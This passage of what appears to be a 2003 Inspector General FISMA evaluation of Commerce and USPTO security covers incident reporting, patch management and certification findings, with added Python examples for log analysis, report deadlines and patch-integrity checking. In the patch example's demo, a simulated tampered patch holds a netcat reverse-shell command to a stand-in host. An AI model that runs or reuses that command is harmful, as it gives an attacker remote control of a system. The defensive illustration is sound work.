    OMB Question B.7: Agency’s identification of its critical operations and assets (both national critical and mission critical) and the interdependencies and interrelationships of those operations and assets.

The Department has identified its national-critical assets, and continues to update and refine this inventory. Using the Project Matrix methodology,[20] the Critical Infrastructure Assurance Office (CIAO) had been helping Commerce identify national-critical assets, and was also supporting an assessment of interdependencies. However, since the CIAO’s move from Commerce to the Department of Homeland Security during this fiscal year, efforts to complete the assessment have ceased. Department officials told us that the Project Matrix methodology has been abandoned by the CIAO and a new methodology is being developed. As noted previously, USPTO has no national-critical systems.

The Department and USPTO have identified their mission-critical assets, and continue to refine this inventory as well. To the extent that security plans for these systems follow NIST guidance, they identify direct interconnections with other systems for information sharing. As the Department and USPTO define and document their enterprise architectures, which show the relationship between business functions and the technologies and information that support them, they should identify interrelationships of mission-critical systems.

[20] Project Matrix has been used to determine the assets and transportation/transmission links essential to meeting responsibilities of the federal government that are deemed “critical,” that is, their incapacitation could jeopardize the nation’s security, seriously disrupt the functioning of the national economy, or adversely affect the health or safety of large segments of the American public. The methodology involves a two-step process in which each civilian federal department and agency identifies (1) its nationally critical functions and services, and (2) the assets and links required to perform or provide them.

X. The Department’s Information Security Policy Has Requirements for Documenting Incident Reporting Procedures

    OMB Question B.8: How agency head ensures that the agency and all its components have documented procedures for reporting security incidents and sharing information regarding common vulnerabilities.

FISMA requires agencies to have documented procedures for detecting, reporting, and responding to security incidents, including steps for notifying and consulting with the Federal Computer Incident Response Center (FedCIRC), appropriate law enforcement agencies, and relevant OIGs when incidents occur. It also requires agencies to ensure compliance with minimally acceptable system configuration requirements. According to OMB, this provision encompasses traditional system configuration management, employing clearly defined system security settings and maintaining up-to-date patches.[21]

Incident Handling and Reporting

Our first independent evaluation in FY 2001 found that only 4 of the Department’s 14 operating units (Census, NOAA, NIST, and USPTO) had established a computer incident response team (CIRT). Last fiscal year, Commerce expanded coverage throughout the Department by creating the DOC CIRT to provide operating units that do not have their own CIRT with an incident response capability. The DOC CIRT is also intended to serve as a focal point for disseminating best practices and incident response methodologies to all Commerce CIRTs.

The Department’s information security policy defines the types of incidents that need to be reported, sets minimum requirements for incident response capabilities, and prescribes the system-level processes and incident-handling procedures to be performed, including reporting incidents to FedCIRC. It establishes requirements for monitoring and detecting incidents, including use of network- and host-based intrusion detection systems, logging tools, firewalls, and other devices, as well as review of audit logs, trouble reports, and information provided by intrusion detection tools.
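The audit-log review the policy calls for is routinely scripted rather than done by eye. The following Python is an added example written for this page, not code from the report or from any Commerce or USPTO CIRT: the sshd-style log lines are constructed, the year 2003 is supplied by the caller because syslog lines carry none, and the tuning (five failed logins from one source within five minutes) is an assumed value. It flags a burst of failures per source address and records whether a successful login from that source followed, which is the case that warrants an incident report rather than a trouble ticket.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd-style audit log lines; not real Commerce or USPTO data.
SAMPLE_LOG = """\
Jul 14 03:12:01 host1 sshd[2231]: Failed password for root from 192.0.2.10 port 51122 ssh2
Jul 14 03:12:03 host1 sshd[2232]: Failed password for root from 192.0.2.10 port 51123 ssh2
Jul 14 03:12:05 host1 sshd[2233]: Failed password for invalid user admin from 192.0.2.10 port 51124 ssh2
Jul 14 03:12:07 host1 sshd[2234]: Failed password for invalid user admin from 192.0.2.10 port 51125 ssh2
Jul 14 03:12:09 host1 sshd[2235]: Failed password for oracle from 192.0.2.10 port 51126 ssh2
Jul 14 03:12:11 host1 sshd[2236]: Accepted password for oracle from 192.0.2.10 port 51127 ssh2
Jul 14 08:45:00 host1 sshd[3100]: Failed password for jsmith from 198.51.100.7 port 40001 ssh2
Jul 14 09:10:00 host1 sshd[3101]: Accepted publickey for jsmith from 198.51.100.7 port 40002 ssh2
Jul 14 09:10:02 host1 cron[3150]: (root) CMD (run-parts /etc/cron.hourly)
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_line(line, year=2003):
    """Return an event dict for an sshd authentication line, or None for any
    other line. Syslog timestamps carry no year, so the caller supplies it
    (assumed to be 2003 for the constructed sample)."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted", "user": m["user"], "src": m["src"]}


def detect_brute_force(lines, threshold=5, window=timedelta(minutes=5)):
    """Flag each source address that produces `threshold` or more failed logins
    inside a sliding `window`, and note whether a successful login from that
    source followed the burst. Returns one alert record per flagged source."""
    failures = defaultdict(deque)   # src -> failure timestamps still inside the window
    targeted = defaultdict(set)     # src -> account names that were tried
    alerts = {}                     # src -> alert record
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        src = ev["src"]
        if ev["ok"]:
            if src in alerts:       # success after a flagged burst: probable compromise
                alerts[src]["success_after"] = True
                alerts[src]["success_user"] = ev["user"]
            continue
        q = failures[src]
        q.append(ev["ts"])
        targeted[src].add(ev["user"])
        while q and ev["ts"] - q[0] > window:   # expire failures older than the window
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = {
                "src": src,
                "failures": len(q),
                "first": q[0],
                "last": ev["ts"],
                "users": set(targeted[src]),
                "success_after": False,
                "success_user": None,
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_brute_force(SAMPLE_LOG.splitlines()):
        print(alert)
```

Run against the sample, the single alert names 192.0.2.10, the three accounts it tried, and the fact that the fifth failure was followed by a successful login as oracle; the one failure from 198.51.100.7 never reaches the threshold and is ignored.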
The policy also requires each operating unit to submit its response procedures to Commerce’s CIP program manager for review and approval, a step intended to ensure that all units have documented procedures for reporting security incidents and sharing information about common vulnerabilities.

According to the policy, all DOC system users and system and network administrators are to report incidents to the operating unit’s designated CIRT. The team, in turn, must complete an incident report and forward it to the DOC CIRT in a secure manner, such as by encrypted transmission. Preliminary reporting must occur within 24 hours of the event’s discovery, after which the CIRT has 5 working days to submit a complete and detailed report to the DOC CIRT. The policy requires operating unit CIRTs to report incidents to FedCIRC and send an informational copy of the report to the DOC CIRT. It makes the DOC CIRT responsible for reporting incidents to FedCIRC for those units that do not have their own response teams. However, it does not specify a timeframe within which FedCIRC must be notified.

[21] A patch is a vendor-supplied code change applied to installed software, without waiting for a full new release, to correct a program error or security vulnerability.

The MOA between OIG, CIO, and OSY further delineates roles, responsibilities, and procedures for reporting incidents to OIG and external law enforcement.
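The 24-hour and 5-working-day requirements above are easy to track mechanically, and the missing FedCIRC deadline is exactly the kind of gap such tracking exposes. The following Python is an added example, not from the report or the DOC CIRT; the incident record layout, the Monday-to-Friday working-day rule, and the caller-supplied holiday list are assumptions made for the example.

```python
from datetime import datetime, timedelta

# Timeframes from the Department's policy as described above.
PRELIMINARY_REPORT = timedelta(hours=24)   # discovery -> preliminary report to DOC CIRT
FULL_REPORT_WORKING_DAYS = 5               # discovery -> complete, detailed report


def add_working_days(start, days, holidays=()):
    """Advance `start` by `days` working days (Monday to Friday), skipping any
    dates listed in `holidays`. Assumes a Mon-Fri week; a production version
    would load the federal holiday calendar instead of taking a tuple."""
    current = start
    while days > 0:
        current += timedelta(days=1)
        if current.weekday() < 5 and current.date() not in holidays:
            days -= 1
    return current


def deadlines(discovered, holidays=()):
    """Both policy deadlines for an incident discovered at `discovered`."""
    return {
        "preliminary_due": discovered + PRELIMINARY_REPORT,
        "full_report_due": add_working_days(discovered, FULL_REPORT_WORKING_DAYS, holidays),
    }


def check_incident(incident, now, holidays=()):
    """Return the list of reporting problems for one incident record.
    `incident` is a dict with 'discovered' and optional 'preliminary_sent',
    'full_report_sent' and 'fedcirc_notified' datetimes (None = not yet done).
    The record layout is an assumption of this example."""
    due = deadlines(incident["discovered"], holidays)
    problems = []
    for key, due_key, label in (
        ("preliminary_sent", "preliminary_due", "preliminary report"),
        ("full_report_sent", "full_report_due", "full report"),
    ):
        sent = incident.get(key)
        deadline = due[due_key]
        if sent is None and now > deadline:
            problems.append(f"{label} overdue since {deadline:%Y-%m-%d %H:%M}")
        elif sent is not None and sent > deadline:
            problems.append(f"{label} late by {sent - deadline}")
    # The policy sets no FedCIRC deadline; flag a missing notification so it is
    # at least visible, since nothing else in the policy would catch it.
    if incident.get("fedcirc_notified") is None:
        problems.append("FedCIRC notification not recorded")
    return problems


if __name__ == "__main__":
    # Constructed incident: discovered Friday afternoon, full report sent the
    # following Monday week, FedCIRC never recorded.
    incident = {
        "discovered": datetime(2003, 7, 11, 15, 0),
        "preliminary_sent": datetime(2003, 7, 12, 10, 0),
        "full_report_sent": datetime(2003, 7, 21, 9, 0),
        "fedcirc_notified": None,
    }
    for problem in check_incident(incident, now=datetime(2003, 7, 22, 9, 0)):
        print(problem)
```

Because the full-report clock counts working days, an incident discovered on a Friday afternoon is not due until the following Friday; a holiday on the intervening Monday pushes it to the Monday after that.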
To ensure the MOA’s reporting procedures are followed, they need to be incorporated into or referenced by the Department’s information security policy after the new MOA is completed.

Configuration requirements

The Department’s policy requires system owners to establish procedures for configuration management of all general support systems and major applications. System security plans must describe how changes to the system or application will be authorized, controlled, tested, and implemented. However, with the exception of certain specific requirements for perimeter security devices and firewalls contained in the information security policy, the Department has not developed specific configuration requirements or defined system security settings. Several of the operating units we reviewed (ITA, NIST, and NOAA) told us that they have provided configuration requirements for specific products based on NIST or National Security Agency (NSA) guidance.

The Department’s policy requires each operating unit IT security officer to have a process and documented procedures in place to identify, track, and report on security patch management. It stipulates that operating units centralize patch management leadership so that timely attention is given to patches for all systems and duplication of patch management functions is minimized.

The operating units we assessed (Census, ITA, NIST, and NOAA) have manual patch management processes; however, most are seeking to automate at least some portions of the process.

FedCIRC provides the web-enabled Patch Authentication and Distribution Capability (PADC), a free, secure source of validated patches. PADC notifies users about new threats or vulnerabilities that could disrupt federal government systems and networks and provides patches that have been verified as secure and able to eliminate the intended vulnerability.
This service is valuable because patches must otherwise be downloaded from Internet sites, some of which have been compromised by attackers who replaced the posted patches with copies carrying malicious code. Commerce has access to PADC, but is just beginning to use it. According to the Department CIO, Commerce will rely on PADC for notification of threats and for tested patches.

USPTO

Incident Handling and Reporting

USPTO has draft incident response procedures, which it intends to finalize by the end of the fiscal year. The procedures are detailed and specific, but do not address a timeframe for reporting incidents to FedCIRC or notification of OIG when an incident occurs. The director of the IT Security Program Office told us that modifications will be made to address these omissions before the procedures are finalized.

Configuration requirements

USPTO officials told us that while the agency has configuration requirements, its certification activities found that the settings could not be traced to an authoritative source such as NIST or NSA. USPTO plans to implement the vendor-recommended security settings.

USPTO has a patch management policy and procedures, has an automated tool to deploy patches and monitor their application, and is a PADC user. According to the director of the IT Security Program Office, IT personnel can view the status of patches on all servers and all but one operating system, and will soon be able to view the status of patches on that remaining system as well. However, certification testing found that appropriate security settings and patches are not always implemented.
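The reason validated patches matter, for the Department and for USPTO alike, is that a patch fetched from an arbitrary site has to be checked against a digest published through a trusted channel before anything installs it. The following Python is an added example, not code from the report, FedCIRC, or PADC: the sample patch payloads and their manifest are constructed, and the manifest format (file name mapped to a hex digest) is an assumption. It refuses weak digest algorithms, compares in constant time, and installs nothing from a bundle in which any file is corrupted, missing, or unlisted.

```python
import hashlib
import hmac

# Constructed sample patch files and the digests a vendor advisory or
# distribution manifest would publish for them. Real digests arrive out of
# band (advisory, PADC, signed manifest); they are computed here only because
# the sample payloads are made up for this example.
PATCHES = {
    "kb-0001.sh": b"#!/bin/sh\n# constructed sample patch\necho applying fix 0001\nexit 0\n",
    "kb-0002.sh": b"#!/bin/sh\n# constructed sample patch\necho applying fix 0002\nexit 0\n",
}
MANIFEST = {name: hashlib.sha256(data).hexdigest() for name, data in PATCHES.items()}

# MD5 and SHA-1 are deliberately absent: collisions are practical for both.
APPROVED_ALGORITHMS = ("sha256", "sha384", "sha512")


class PatchIntegrityError(Exception):
    """Raised when a downloaded bundle does not match its published manifest."""


def verify_patch(data, expected_hex, algorithm="sha256"):
    """Return True only if `data` hashes to `expected_hex` under `algorithm`.
    The comparison is constant time so the check itself leaks nothing."""
    if algorithm not in APPROVED_ALGORITHMS:
        raise ValueError(f"unsupported or weak digest algorithm: {algorithm}")
    actual = hashlib.new(algorithm, data).hexdigest()
    return hmac.compare_digest(actual, expected_hex.strip().lower())


def verify_bundle(downloaded, manifest, algorithm="sha256"):
    """Check every downloaded file against the manifest (name -> hex digest).
    Returns name -> 'ok' | 'corrupted' | 'missing' | 'unexpected'."""
    report = {}
    for name, expected in manifest.items():
        if name not in downloaded:
            report[name] = "missing"
        elif verify_patch(downloaded[name], expected, algorithm):
            report[name] = "ok"
        else:
            report[name] = "corrupted"
    for name in downloaded:
        if name not in manifest:
            report[name] = "unexpected"   # a file the trusted manifest never listed
    return report


def install_verified(downloaded, manifest, install):
    """Call `install(name, data)` for each patch only if the whole bundle
    verifies; a single bad, missing or extra file aborts the entire install."""
    report = verify_bundle(downloaded, manifest)
    bad = {name: status for name, status in report.items() if status != "ok"}
    if bad:
        raise PatchIntegrityError(f"refusing to install: {bad}")
    for name in manifest:
        install(name, downloaded[name])
    return list(manifest)


if __name__ == "__main__":
    # Simulate a mirror that swapped in a backdoored copy of one patch.
    tampered = dict(PATCHES)
    tampered["kb-0001.sh"] = PATCHES["kb-0001.sh"].replace(b"exit 0", b"nc 203.0.113.5 4444 -e /bin/sh")
    print(verify_bundle(tampered, MANIFEST))
```

The digest only proves the file matches what the manifest author published, so the manifest itself has to come over a channel the mirror cannot alter; that is the role PADC plays for the agencies above.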
USPTO reports that five IT staff members are registered users of PADC.

Responsibilities of Program Officials and Chief Information Officers

XI. The Department’s Risk Assessments, Security Plans, and Testing of Security Controls Continue to Need Serious Attention

    OMB Question C.1: Risk assessments, security level determinations, security plans, and security control testing and evaluation.

FISMA assigns senior agency officials and the CIO responsibility for assessing the information security risks for programs and systems over which they have control, determining the levels of information security appropriate to protect associated operations and assets, and periodically testing and evaluating information security controls and techniques. In turn, the Department’s policy has charged all operating unit officials and CIOs with these same responsibilities in their organizations.

In last year’s independent evaluation, we found numerous systems operating without required risk assessments or approved security plans. Some that had approved security plans provided no evidence that risk analysis, a prerequisite for the security plan, had been conducted. Most operational systems had not been certified and accredited, and those that were frequently lacked evidence that the requisite security testing and evaluation had been performed.
As noted previously, the Department CIO set September 30, 2003, as the deadline for having all national-critical and mission-critical systems certified and accredited.

In June 2003, we requested certification and accreditation materials, including risk assessments, security plans, contingency plans, and security test and evaluation materials (test procedures and results) for a range of systems we selected throughout the Department. As shown in table 5, our review of these materials for 37 systems in 6 operating units (including 5 NOAA line offices) found serious deficiencies in the content and quality of the risk assessments and plans. We found many risk assessments and security plans that did not provide essential information for determining appropriate system security controls, and still others whose information was inaccurate or inconsistent. We also found that the certifications were frequently granted without careful review of the documentation and without testing, and thus did not identify residual risks.[22] Without reliable documentation and certifications, accrediting officials lack sufficient information for making informed decisions about whether a system’s residual risks are acceptable and accreditation is therefore desirable.
(Through accreditation, the DAA, the designated approving authority, explicitly accepts the residual risks; therefore, these risks must be clearly identified.)

In cases where testing was conducted, it was usually in the form of vulnerability scans,[23] which, while a useful part of the testing process and required annually by the Department’s policy, do not adequately cover security controls for certification purposes for any but low-risk systems. Certification test and evaluation should include such measures as penetration testing, observation of how controls are implemented, document review, and interviews.

[22] Residual risks are the risks remaining after appropriate security controls have been applied to the information system.
[23] Vulnerability scans use automated tools to identify vulnerabilities of computing systems in a network in order to determine whether and where a system can be exploited or threatened.

The deficiencies we identified affected systems controlled by program officials as well as by operating unit CIOs. Details of our evaluation criteria and results for each operating unit that we assessed are presented in Appendix A.
We recognize that a number of Commerce systems, including ones that we reviewed, are undergoing recertifications and reaccreditations, which are scheduled to be completed by September 30, to comply with the new information security policy. According to the Department CIO, improvements are being made as part of this process that should correct a number of the problems we identified with the current accreditations.

Table 5: Summary of OIG Evaluation of Commerce Certification and Accreditation Materials*

  Criteria                                                                   OIG Evaluation
  Number of systems reviewed                                                             37
  Number of systems certified and accredited                                             30
  Number of systems certified and accredited with adequate testing                        0
  Number of systems certified and accredited with residual risks identified               0
  Number of risk assessments that provide a sufficient basis for identifying
    security controls                                                                    11
  Number of security plans that adequately:
    --Describe applications/data/data flow                                                7
    --Identify interconnections                                                          15
    --Provide support for assigned sensitivity levels                                     9
  Number of contingency plans that adequately:
    --Identify alternate sites                                                           14
    --Describe backup procedures                                                         28
    --Describe system restoration procedures                                              7

* Assessment covered systems in the following operating units: BEA, BIS, Census, NIST, NTIS, and NOAA (NESDIS, NMFS, NOS, NWS, and OAR).

XII. USPTO Is Making Significant Improvements to Risk Assessments, Security Plans, and Testing of Security Controls

    OMB Question C.1: Risk assessments, security level determinations, security plans, and security control testing and evaluation.

Based on the materials that we reviewed for USPTO’s one certified and accredited system, it is evident that the agency has made an extremely conscientious effort to employ a disciplined process using the NIACAP standard. This system had a thorough risk assessment and comprehensive security and contingency plans. Certification included extensive testing of security controls that identified weaknesses in the system itself, as well as organization-wide security issues. We note, however, that the security plan only provided examples of interconnections with other systems, rather than identifying all interconnections, as directed by NIST guidance. Overall, USPTO has a sound approach, which it appears to be using for certifying and accrediting its remaining systems.

As we discussed previously, of the 10 systems scheduled to be certified and accredited this fiscal year, 1 has been fully accredited and 5 have been granted interim accreditations.
USPTO expects the remaining 4 systems to receive interim accreditations by the September 30 deadline. The agency’s interim accreditations require comprehensive risk assessments, security plans, and testing of security controls. As USPTO corrects the problems identified by means of its certification and accreditation process, its systems will be appreciably more secure.

XIII. The Department CIO Continues to Make Progress in Improving Information Security Throughout Commerce

    OMB Question C.2: The agency CIO’s ability to adequately maintain an agencywide information security program, ensure effective implementation of the program, and evaluate the performance of major agency components.

Over the past several years, the Department CIO has focused intensely on improving information security and has made significant strides. In finalizing the new information security policy this past January, he gave Commerce a comprehensive blueprint for securing agency information systems that complies with the minimum requirements for security programs set forth in OMB Circular A-130: namely, that each system have (1) a knowledgeable Commerce official assigned responsibility for its security, (2) a risk assessment and security plan, (3) a periodic review of its security controls, and (4) authorization to operate (certification and accreditation).
As required by FISMA, the CIO has designated a senior officer for information security.

The Department CIO is making a determined effort to effectively implement the security program, though much remains to be done, especially in the areas of assessing risk, determining appropriate security controls, testing and evaluating these controls, and certifying and accrediting systems. But satisfying the demands of information security law, policy, and guidance requires substantial change in the culture of an organization that, until recently, has given scant attention to this area. Thus, it remains a considerable challenge to ensure that program and IT officials throughout the Department understand and accept their information security responsibilities and that personnel with specialized information security roles continually increase their knowledge and skills to address a technically complex and constantly changing security environment.

The Department CIO's Office has initiated a compliance review program to evaluate the performance of all Commerce operating units by validating the security information they report and assessing the effectiveness of their information security programs. As noted previously, the CIO intends to review all systems over a 3-year cycle. The fiscal year 2003 review has three objectives: (1) validate the system inventory, (2) inspect the quality of certification and accreditation packages for all classified, national-critical, and mission-critical systems in the inventory as of March 2003, and (3) verify implementation of corrective actions to resolve the recommendations from GAO reports issued in August 2001 and January 2002.
The Department CIO Office's management and oversight of the POA&M process is an additional means by which it evaluates operating unit performance.

USPTO

Last fiscal year, USPTO's newly appointed CIO began giving serious attention to improving information security and establishing and maintaining an agencywide information security program, and excellent progress has been made as a result. USPTO's information security policies, when refined and finalized, should address the basic security program requirements of OMB Circular A-130 that each system have a knowledgeable USPTO official assigned responsibility for its security, a risk assessment and security plan, a periodic review of its security controls, and certification and accreditation. As required by FISMA, a senior agency information security officer has been designated by USPTO's CIO. And as we have discussed previously, USPTO is well on its way to certifying and accrediting all of its mission-critical systems and is using sound processes to do so.

As in the rest of the Department, effectively implementing the stipulated information security program requires significant cultural change. USPTO's CIO is currently working with program officials to facilitate their understanding and acceptance of their more active role and increased accountability before the policy is finalized.
We believe that the CIO's effort is essential to initiating and maintaining an efficacious information security program.

The ongoing certification and accreditation efforts, the POA&M process, and the work of the internal IT auditor (i.e., unannounced penetration testing of networks and systems and review of security documentation) are the principal means by which USPTO's major components are currently being evaluated. The Department intends to assess USPTO as part of its compliance review, which will provide an additional means of evaluation.

XIV. Information Security Awareness Training Is Being Addressed, but Specialized Training Requirements Are Needed

The agency CIO's efforts to ensure that all agency employees, including contractors and those employees with significant information security responsibilities, are aware of and trained in information security policies and practices. (OMB Question C.3)

The Department's new policy requires each operating unit's information security program to include an awareness, training, and education component for all employees and contractors, remote researchers and collaborators working on Commerce projects, and temporary guest system users.
New employees and contractors must receive awareness training within 30 days of hire and prior to using any IT resource. All existing employees and contractors who have access to systems containing sensitive information are required to have annual refresher training. Operating units must maintain a tracking system that identifies those trained, and the type and date of training taken.

Department and operating unit officials told us that security awareness training is provided annually for all employees and contractor personnel. During this fiscal year, the CIO enhanced and disseminated its awareness training for new employees and acquired an enterprise license for web-based information security training, which has recently made awareness refresher training customized for Commerce available at no charge to Commerce employees and contractors. This training is provided by the Gov Online Learning Center (referred to as GOLearn).24

Specialized training. Under the Department's policy, operating units must identify positions that require specialized training as well as the specific requirements of that training. We found limited progress in this area. Training for personnel with significant information security responsibilities, such as system administrators, IT security officers, and contracting officers, appeared to be inconsistent and incomplete at the units we reviewed. The Department has been attempting to establish more uniform requirements or guidance for specialized training, but progress here has been slow. A working group convened in FY 2001 to address specialized training helped develop the Department's training policy and conducted a needs assessment, but has not defined requirements for specialized training.
In the meantime, the Department CIO is making training more accessible: the recently acquired enterprise license will make specialized training available throughout Commerce at a nominal cost. The approximately 60 GOLearn courses are mapped to various positions identified in NIST Special Publication 800-16, Information Technology Security Training Requirements: A Role- and Performance-Based Model. One area that is progressing is training of procurement personnel. As discussed in Finding I, OAM has developed security training for these personnel, which is undergoing review.

In conducting our independent evaluation this year, we found that some IT security officers and system administrators still do not sufficiently understand their duties and responsibilities. We also found a pervasive lack of understanding of the objectives and requirements of system risk assessment, security planning, contingency planning, and certification and accreditation. These findings highlight the importance of ensuring that specialized security training is provided to those who need it.

24 The Gov Online Learning Center offers web-based training to federal employees.

USPTO

USPTO is using GOLearn through the Department's enterprise license to provide the mandated annual refresher training in information security awareness, and also requires awareness training for new employees and contractors. USPTO has not yet established requirements for specialized training and is using NIST training guidance to do so.
In the meantime, USPTO executives have received specialized training in information security, including certification and accreditation, and CIO managers and staff have been trained on USPTO's IT processes and related information security procedures, as have some program, administrative, and contractor employees. USPTO plans to implement specialized training for approximately 150 employees and contractors, also via GOLearn. As noted, these courses are mapped to various positions identified in NIST guidance.

XV. Integration of Security into the Capital Planning and Investment Control Process Is Improving

Agency CIO's efforts to fully integrate security into the capital planning and investment control process. (OMB Question C.4)

Our review of capital asset plans last year revealed that the operating units need to do a better job of identifying security risks and controls in their capital asset plans so as to improve and better justify projections of security expenditures. This year, we reviewed FY 2004 plans for BIS, NESDIS, NOS, NWS, and NTIA (FY 2005 plans were not available when we conducted our fieldwork) and noted that in general, they contained more specific information on security requirements and how they are addressed. Some, however, still contained generic discussions of security requirements and controls, and one plan was ambiguous about whether the system had been certified and accredited.
All of the plans stated that the system's security controls had been tested, but few described the test methodology. Our review of security materials, as noted in Finding XI, found little if any testing of security controls for most systems beyond self-assessments.

USPTO

We reported last year that USPTO had not identified security costs for any individual system in its FY 2002 or FY 2003 budget submissions. In this year's review, we found that capital asset plans prepared for the FY 2004 submission comprehensively addressed the areas required by OMB and thus demonstrate a serious effort by USPTO to include information security in its capital asset planning.

XVI. Conclusion

Our FY 2003 FISMA review found that senior management continues to give attention and priority to information security. With the support of the Deputy Secretary, the Department's CIO has worked hard to improve information security throughout Commerce. In January 2003, the CIO finalized a new information security policy that comprehensively defines Commerce's program for protecting agency information systems, and its detailed requirements are helping improve the security programs of the operating units. Responsibilities are clearly delineated for Commerce's senior agency officials and CIOs, system life-cycle information security requirements are specified, and security is becoming better integrated into the capital planning and investment control process.

This noteworthy progress is moderated by the considerable challenges that persist, the greatest of which is ensuring adequate security on the hundreds of Commerce systems.
Much remains to be done in this regard, especially in assessing risk and determining appropriate security controls, testing and evaluating these controls, certifying and accrediting systems, and ensuring that personnel with specialized information security responsibilities receive the necessary training. As we have pointed out previously, implementing an effective information security program throughout Commerce requires both education and substantial cultural change. Until program and IT officials throughout the Department better understand what is expected of them, and all personnel with specialized information security roles acquire and maintain the requisite knowledge and skills, the security of many Commerce systems remains problematic.

USPTO

USPTO's information security program continues to progress. This agency is working to ensure that its senior program officials understand and accept their responsibilities for information security, a prerequisite for an effective and long-lived program. Security has become better integrated into the capital planning and investment control process for IT, and system life-cycle information security requirements and processes are being improved. Significantly, USPTO is well on its way to having its systems certified and accredited. And because it is using a rigorous approach and comprehensive testing, it has gained a great deal of insight into system-specific weaknesses that must be corrected and organization-wide security policies, procedures, and processes that must be improved. USPTO must continue to focus on actions to correct the identified system weaknesses; improve policies, procedures, and processes; and ensure compliance on a continuing basis.
Appendix A. Evaluation of Certification and Accreditation Materials

In answer to OMB Question C.1, this appendix presents the results of our evaluation of the extent to which operating unit program officials and CIOs have, for the systems for which they are responsible, (1) assessed risks, (2) determined appropriate security levels, (3) maintained security plans, and (4) tested and evaluated security controls. We reviewed the following information for 37 systems in 6 operating units, including 5 NOAA line offices:25

• Risk assessment
• Security plan
• Contingency plan
• Security test and evaluation materials (test procedures and results)
• Any additional certification and accreditation materials
• Any reports that document an independent security assessment of the system (e.g., a contractor assessment)

In reviewing this information, we focused on whether the following had been accomplished:

Systems have been certified and accredited with adequate testing. Testing security controls is essential for validating that the required controls are in place and working as intended, and is a key part of system certification.

Residual risks have been identified for certified and accredited systems. Residual risks are the risks remaining after appropriate security controls have been incorporated in a system. In accrediting a system, the DAA is explicitly accepting the residual risks; therefore, these risks must be clearly identified.

Risk assessments provide a sufficient basis for identifying security controls.
To determine system security controls that appropriately balance the cost of protective measures against operational and economic costs, risks must be identified and their impacts assessed.

Security plans adequately describe applications, data, data flow, and system interconnections, and support the assigned sensitivity levels. This is fundamental information for planning system security. Sensitivity levels are determined to be low, medium, or high based on requirements for confidentiality, integrity, and availability of the information handled, and are needed to design appropriate security controls.

Contingency plans identify alternate processing sites, and describe system backup and restoration procedures. This is basic information to enable the recovery of systems, operations, and data after a disruption.

We were able to determine whether a system's risk assessment, security plan, or contingency plan generally provided the appropriate information, but without a thorough assessment of the system itself, we could not determine whether the information was complete or wholly accurate. In many cases, however, information was clearly missing, inconsistent with other information presented, or not responsive to the intent of the document. Although some operating units sent us draft materials, we evaluated final documentation only.

25 Our evaluation of USPTO is presented separately in Finding XI.

We present our findings for the operating units we reviewed in the tables below, showing for each the number of evaluated systems that met the corresponding OMB criterion.
Where additional information is useful, we include brief comments.

Table A-1: Bureau of Economic Analysis

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 3 |
Number of systems certified and accredited | 2 |
Number of systems certified and accredited with adequate testing | 0 |
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 1 |
Number of security plans that adequately: | |
--Describe applications/data/data flow | 1 |
--Identify interconnections | 3 |
--Provide support for assigned sensitivity levels | 2 | One plan had assigned medium confidentiality to publicly available information.
Number of contingency plans that adequately: | | One plan covered all 3 systems (the local area network and 2 applications), and contained detailed procedures and evidence of recent testing.
--Identify alternate sites | 3 |
--Describe backup procedures | 3 |
--Describe system restoration procedures | 3 |
Table A-2: Bureau of Industry and Security

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 3 |
Number of systems certified and accredited | 0 | Two systems have interim accreditations that expire in late September 2003. For 1 system, no documentation was provided to support the 12/31/02 accreditation.
Number of systems certified and accredited with adequate testing | 0 | Automated vulnerability scan results were provided for 1 system.
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 1 |
Number of security plans that adequately: | |
--Describe applications/data/data flow | 1 |
--Identify interconnections | 2 |
--Provide support for assigned sensitivity levels | 1 |
Number of contingency plans that adequately: | |
--Identify alternate sites | 0 |
--Describe backup procedures | 1 |
--Describe system restoration procedures | 0 |
Table A-3: Census Bureau

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 4* |
Number of systems certified and accredited | 4 |
Number of systems certified and accredited with adequate testing | 0 |
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 1 |
Number of security plans that adequately: | |
--Describe applications/data/data flow | 2 |
--Identify interconnections | 4 |
--Provide support for assigned sensitivity levels | 3 |
Number of contingency plans that adequately: | |
--Identify alternate sites | 3 |
--Describe backup procedures | 3 |
--Describe system restoration procedures | 2 |

*We reviewed general support systems for the National Processing Center and Geography division. The Geography system has four components, three of which had final documentation. Documentation for the fourth is being developed. We assessed the three that have final documentation, treating them as separate systems for purposes of this review. Census plans to accredit the fourth component and the Geography system as a whole in early FY 2004.
Table A-4: National Institute of Standards and Technology

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 5 |
Number of systems certified and accredited | 5 | IT security officer is reviewing all certified and accredited systems and making recommendations for improvement. Vulnerability scans are being required as a condition of staying on the network.
Number of systems certified and accredited with adequate testing | 0 |
Number of systems certified and accredited with residual risks identified | 0 |
Number of risk assessments that provide a sufficient basis for identifying security controls | 2 |
Number of security plans that adequately: | |
--Describe applications/data/data flow | 1 |
--Identify interconnections | 2 |
--Provide support for assigned sensitivity levels | 0 | Two systems did not address sensitivity, and the remaining 3 did not justify the sensitivity levels assigned.
Number of contingency plans that adequately: | | Two systems had no contingency plan.
--Identify alternate sites | 1 |
--Describe backup procedures | 3 |
--Describe system restoration procedures | 2 |
Table A-5: National Technical Information Service

Criteria | OIG Evaluation | Comment
Number of systems reviewed | 3 |
Number of systems certified and accredited | 0 | All 3 systems have expired interim accreditations. NTIS plans to reaccredit these systems by end of the fiscal year.
Number of systems certified and accredited with adequate testing | 0 | Interim accreditation letters state that testing was performed, but no evidence was provided.
